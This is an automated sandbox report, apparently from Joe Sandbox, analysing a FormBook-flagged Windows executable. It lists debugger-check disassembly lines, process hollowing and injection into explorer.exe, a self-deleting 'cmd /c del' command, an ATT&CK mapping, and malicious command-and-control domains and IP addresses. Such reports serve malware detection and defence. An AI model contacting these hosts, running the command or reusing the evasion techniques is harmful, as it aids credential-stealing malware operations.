          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606C0A mov eax, dword ptr fs:[00000030h]7_2_04606C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606C0A mov eax, dword ptr fs:[00000030h]7_2_04606C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606C0A mov eax, dword ptr fs:[00000030h]7_2_04606C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BBC2C mov eax, dword ptr fs:[00000030h]7_2_045BBC2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606CF0 mov eax, dword ptr fs:[00000030h]7_2_04606CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606CF0 mov eax, dword ptr fs:[00000030h]7_2_04606CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606CF0 mov eax, dword ptr fs:[00000030h]7_2_04606CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046414FB mov eax, dword ptr fs:[00000030h]7_2_046414FB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04658CD6 mov eax, dword ptr fs:[00000030h]7_2_04658CD6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459849B mov eax, dword ptr fs:[00000030h]7_2_0459849B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A7D50 mov eax, dword ptr fs:[00000030h]7_2_045A7D50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C3D43 mov eax, dword ptr fs:[00000030h]7_2_045C3D43
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04603540 mov eax, dword ptr fs:[00000030h]7_2_04603540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AC577 mov eax, dword ptr fs:[00000030h]7_2_045AC577
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AC577 mov eax, dword ptr fs:[00000030h]7_2_045AC577
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04658D34 mov eax, dword ptr fs:[00000030h]7_2_04658D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0460A537 mov eax, dword ptr fs:[00000030h]7_2_0460A537
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464E539 mov eax, dword ptr fs:[00000030h]7_2_0464E539
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B4D3B mov eax, dword ptr fs:[00000030h]7_2_045B4D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B4D3B mov eax, dword ptr fs:[00000030h]7_2_045B4D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B4D3B mov eax, dword ptr fs:[00000030h]7_2_045B4D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458AD30 mov eax, dword ptr fs:[00000030h]7_2_0458AD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04593D34 mov eax, dword ptr fs:[00000030h]7_2_04593D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464FDE2 mov eax, dword ptr fs:[00000030h]7_2_0464FDE2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464FDE2 mov eax, dword ptr fs:[00000030h]7_2_0464FDE2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464FDE2 mov eax, dword ptr fs:[00000030h]7_2_0464FDE2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464FDE2 mov eax, dword ptr fs:[00000030h]7_2_0464FDE2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04638DF1 mov eax, dword ptr fs:[00000030h]7_2_04638DF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606DC9 mov eax, dword ptr fs:[00000030h]7_2_04606DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606DC9 mov eax, dword ptr fs:[00000030h]7_2_04606DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606DC9 mov eax, dword ptr fs:[00000030h]7_2_04606DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606DC9 mov ecx, dword ptr fs:[00000030h]7_2_04606DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606DC9 mov eax, dword ptr fs:[00000030h]7_2_04606DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606DC9 mov eax, dword ptr fs:[00000030h]7_2_04606DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459D5E0 mov eax, dword ptr fs:[00000030h]7_2_0459D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459D5E0 mov eax, dword ptr fs:[00000030h]7_2_0459D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BFD9B mov eax, dword ptr fs:[00000030h]7_2_045BFD9B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BFD9B mov eax, dword ptr fs:[00000030h]7_2_045BFD9B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046505AC mov eax, dword ptr fs:[00000030h]7_2_046505AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046505AC mov eax, dword ptr fs:[00000030h]7_2_046505AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04582D8A mov eax, dword ptr fs:[00000030h]7_2_04582D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04582D8A mov eax, dword ptr fs:[00000030h]7_2_04582D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04582D8A mov eax, dword ptr fs:[00000030h]7_2_04582D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04582D8A mov eax, dword ptr fs:[00000030h]7_2_04582D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04582D8A mov eax, dword ptr fs:[00000030h]7_2_04582D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2581 mov eax, dword ptr fs:[00000030h]7_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2581 mov eax, dword ptr fs:[00000030h]7_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2581 mov eax, dword ptr fs:[00000030h]7_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B2581 mov eax, dword ptr fs:[00000030h]7_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B1DB5 mov eax, dword ptr fs:[00000030h]7_2_045B1DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B1DB5 mov eax, dword ptr fs:[00000030h]7_2_045B1DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B1DB5 mov eax, dword ptr fs:[00000030h]7_2_045B1DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B35A1 mov eax, dword ptr fs:[00000030h]7_2_045B35A1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04597E41 mov eax, dword ptr fs:[00000030h]7_2_04597E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464AE44 mov eax, dword ptr fs:[00000030h]7_2_0464AE44
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464AE44 mov eax, dword ptr fs:[00000030h]7_2_0464AE44
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AAE73 mov eax, dword ptr fs:[00000030h]7_2_045AAE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AAE73 mov eax, dword ptr fs:[00000030h]7_2_045AAE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AAE73 mov eax, dword ptr fs:[00000030h]7_2_045AAE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AAE73 mov eax, dword ptr fs:[00000030h]7_2_045AAE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AAE73 mov eax, dword ptr fs:[00000030h]7_2_045AAE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459766D mov eax, dword ptr fs:[00000030h]7_2_0459766D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BA61C mov eax, dword ptr fs:[00000030h]7_2_045BA61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BA61C mov eax, dword ptr fs:[00000030h]7_2_045BA61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458C600 mov eax, dword ptr fs:[00000030h]7_2_0458C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458C600 mov eax, dword ptr fs:[00000030h]7_2_0458C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458C600 mov eax, dword ptr fs:[00000030h]7_2_0458C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B8E00 mov eax, dword ptr fs:[00000030h]7_2_045B8E00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463FE3F mov eax, dword ptr fs:[00000030h]7_2_0463FE3F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641608 mov eax, dword ptr fs:[00000030h]7_2_04641608
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458E620 mov eax, dword ptr fs:[00000030h]7_2_0458E620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B36CC mov eax, dword ptr fs:[00000030h]7_2_045B36CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C8EC7 mov eax, dword ptr fs:[00000030h]7_2_045C8EC7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463FEC0 mov eax, dword ptr fs:[00000030h]7_2_0463FEC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04658ED6 mov eax, dword ptr fs:[00000030h]7_2_04658ED6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B16E0 mov ecx, dword ptr fs:[00000030h]7_2_045B16E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045976E2 mov eax, dword ptr fs:[00000030h]7_2_045976E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04650EA5 mov eax, dword ptr fs:[00000030h]7_2_04650EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04650EA5 mov eax, dword ptr fs:[00000030h]7_2_04650EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04650EA5 mov eax, dword ptr fs:[00000030h]7_2_04650EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046046A7 mov eax, dword ptr fs:[00000030h]7_2_046046A7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461FE87 mov eax, dword ptr fs:[00000030h]7_2_0461FE87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04658F6A mov eax, dword ptr fs:[00000030h]7_2_04658F6A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459EF40 mov eax, dword ptr fs:[00000030h]7_2_0459EF40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459FF60 mov eax, dword ptr fs:[00000030h]7_2_0459FF60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AF716 mov eax, dword ptr fs:[00000030h]7_2_045AF716
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BA70E mov eax, dword ptr fs:[00000030h]7_2_045BA70E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BA70E mov eax, dword ptr fs:[00000030h]7_2_045BA70E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465070D mov eax, dword ptr fs:[00000030h]7_2_0465070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465070D mov eax, dword ptr fs:[00000030h]7_2_0465070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BE730 mov eax, dword ptr fs:[00000030h]7_2_045BE730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461FF10 mov eax, dword ptr fs:[00000030h]7_2_0461FF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461FF10 mov eax, dword ptr fs:[00000030h]7_2_0461FF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04584F2E mov eax, dword ptr fs:[00000030h]7_2_04584F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04584F2E mov eax, dword ptr fs:[00000030h]7_2_04584F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C37F5 mov eax, dword ptr fs:[00000030h]7_2_045C37F5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04598794 mov eax, dword ptr fs:[00000030h]7_2_04598794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607794 mov eax, dword ptr fs:[00000030h]7_2_04607794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607794 mov eax, dword ptr fs:[00000030h]7_2_04607794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607794 mov eax, dword ptr fs:[00000030h]7_2_04607794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A0050 mov eax, dword ptr fs:[00000030h]7_2_045A0050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A0050 mov eax, dword ptr fs:[00000030h]7_2_045A0050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04651074 mov eax, dword ptr fs:[00000030h]7_2_04651074
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04642073 mov eax, dword ptr fs:[00000030h]7_2_04642073
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04654015 mov eax, dword ptr fs:[00000030h]7_2_04654015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04654015 mov eax, dword ptr fs:[00000030h]7_2_04654015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459B02A mov eax, dword ptr fs:[00000030h]7_2_0459B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459B02A mov eax, dword ptr fs:[00000030h]7_2_0459B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459B02A mov eax, dword ptr fs:[00000030h]7_2_0459B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0459B02A mov eax, dword ptr fs:[00000030h]7_2_0459B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607016 mov eax, dword ptr fs:[00000030h]7_2_04607016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607016 mov eax, dword ptr fs:[00000030h]7_2_04607016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04607016 mov eax, dword ptr fs:[00000030h]7_2_04607016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]7_2_045B002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]7_2_045B002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]7_2_045B002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]7_2_045B002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B002D mov eax, dword ptr fs:[00000030h]7_2_045B002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461B8D0 mov eax, dword ptr fs:[00000030h]7_2_0461B8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045858EC mov eax, dword ptr fs:[00000030h]7_2_045858EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04589080 mov eax, dword ptr fs:[00000030h]7_2_04589080
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BF0BF mov ecx, dword ptr fs:[00000030h]7_2_045BF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BF0BF mov eax, dword ptr fs:[00000030h]7_2_045BF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BF0BF mov eax, dword ptr fs:[00000030h]7_2_045BF0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04603884 mov eax, dword ptr fs:[00000030h]7_2_04603884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04603884 mov eax, dword ptr fs:[00000030h]7_2_04603884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C90AF mov eax, dword ptr fs:[00000030h]7_2_045C90AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045B20A0 mov eax, dword ptr fs:[00000030h]7_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AB944 mov eax, dword ptr fs:[00000030h]7_2_045AB944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045AB944 mov eax, dword ptr fs:[00000030h]7_2_045AB944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0458B171 mov eax, dword ptr fs:[00000030h]7_2_0458B171
          Source: C:\Users\user\Desktop\RCS76393.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\RCS76393.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RCS76393.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\RCS76393.exe Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msiexec.exe Thread register set: target process: 3440
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\RCS76393.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\RCS76393.exe Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 1A0000
          Source: C:\Users\user\Desktop\RCS76393.exe Process created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RCS76393.exe'
          Source: explorer.exe, 00000005.00000000.338938773.0000000004F80000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.329924999.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\RCS76393.exe Code function: 2_2_0040B530 GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | DLL Side-Loading 1 | Process Injection 512 | Virtualization/Sandbox Evasion 2 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Process Injection 512 | LSASS Memory | Security Software Discovery 121 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 4 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 13 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | System Information Discovery 12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

          Behavior Graph

          [Behavior graph. ID: 383936; Sample: RCS76393.exe; Startdate: 08/04/2021; Architecture: WINDOWS; Score: 100. Process chain: RCS76393.exe started RCS76393.exe, which injected into explorer.exe; explorer.exe started msiexec.exe, which started cmd.exe, which started conhost.exe.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          RCS76393.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          3.1.RCS76393.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.msiexec.exe.4be7960.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          3.2.RCS76393.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains


          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.batiktintaemas.com/goei/ | true | Avira URL Cloud: malware | low

          URLs from Memory and Binaries

                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.161.84.100 | www.ronwongart.com | United States | 53755 | IOFLOODUS | true
94.46.9.37 | generalflix.com | Sweden | 200719 | MISSDOMAINSE | true
199.59.242.153 | www.addthat.xyz | United States | 395082 | BODIS-NJUS | true
198.185.159.144 | ext-cust.squarespace.com | United States | 53831 | SQUARESPACEUS | false
34.102.136.180 | foodsystemsjusticeproject.com | United States | 15169 | GOOGLEUS | false
193.168.194.206 | batiktintaemas.com | Germany | 47583 | AS-HOSTINGERLT | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | true
104.160.174.177 | l.17986.net | United States | 46844 | ST-BGPUS | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383936
Start date: 08.04.2021
Start time: 12:45:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 18s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: RCS76393.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/0@12/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 30.7% (good quality ratio 27.9%)
• Quality average: 71.8%
• Quality standard deviation: 31.6%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 64
• Number of non-executed functions: 174
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.82.210.154, 13.64.90.137, 204.79.197.200, 13.107.21.200, 23.54.113.53, 40.88.32.150, 104.43.139.144, 52.255.188.83, 20.50.102.62, 23.10.249.43, 23.10.249.26, 23.0.174.200, 23.0.174.185, 52.155.217.156, 20.54.26.129, 95.100.54.203
